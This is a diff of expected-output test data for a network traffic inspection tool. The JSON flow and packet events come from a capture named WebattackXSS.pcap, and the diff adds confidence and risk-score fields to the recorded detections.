-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="}
@@ -1708,17 +1708,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347495714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ai5AAD4GW6KsEAABwKgKMuHOAFCuqYG6AAAAAKACchBfsgAAAgQFtAQCCAoBOuuUAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347495714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4c4n\/DE+rqmBu6AScSBGaAAAAgQFtAQCCAoD5L0KATrrlAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4407,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":3,"flow_last_seen":1499347495715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347495715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ai9AAD4GW6msEAABwKgKMuHOAFCuqYG7J\/wxP4AQAOXlbwAAAQEICgE665QD5L0K"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347496740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347498249,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347498249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347498249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LPFAAD4GmN+sEAABwKgKMuHoAFBfF8L\/AAAAAKACchBrawAAAgQFtAQCCAoBOu4OAAAAAAEDAwc="}
@@ -1744,17 +1744,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347505774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/VAAD4GSdusEAABwKgKMuI6AFCzho6SAAAAAKACchBDvgAAAgQFtAQCCAoBOvVnAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4490,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347505774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4joOXGebs4aOk6AScSAD5AAAAgQFtAQCCAoD5MbdATr1ZwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":3,"flow_last_seen":1499347505775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347505775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/ZAAD4GSeKsEAABwKgKMuI6AFCzho6TDlxnnIAQAOWi6wAAAQEICgE69WcD5Mbd"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
